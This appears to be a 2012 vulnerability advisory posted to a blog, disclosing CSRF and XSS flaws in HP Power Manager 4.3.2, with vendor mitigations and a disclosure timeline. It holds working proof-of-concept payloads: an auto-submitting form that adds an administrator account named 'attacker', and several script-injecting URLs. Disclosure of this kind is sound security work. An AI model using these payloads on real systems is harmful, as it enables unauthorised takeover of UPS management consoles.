Thursday, April 19, 2012

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />
<input type="hidden" name="pass9" value="passwd123" />
<input type="hidden" name="rpass9" value="passwd123" />
<input type="hidden" name="admin9" value="on" />
<input type="hidden" name="actionType" value="1" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================
  • http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e

Solution
HP recommends the following:
  • Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.
  • Do not visit untrusted web sites while logged on to HPPM.
  • Use a firewall to limit access to HPPM.

References
Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS. 
2011-03-10 - Advisory updated by Secunia.
Posted by at
Labels: , ,

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)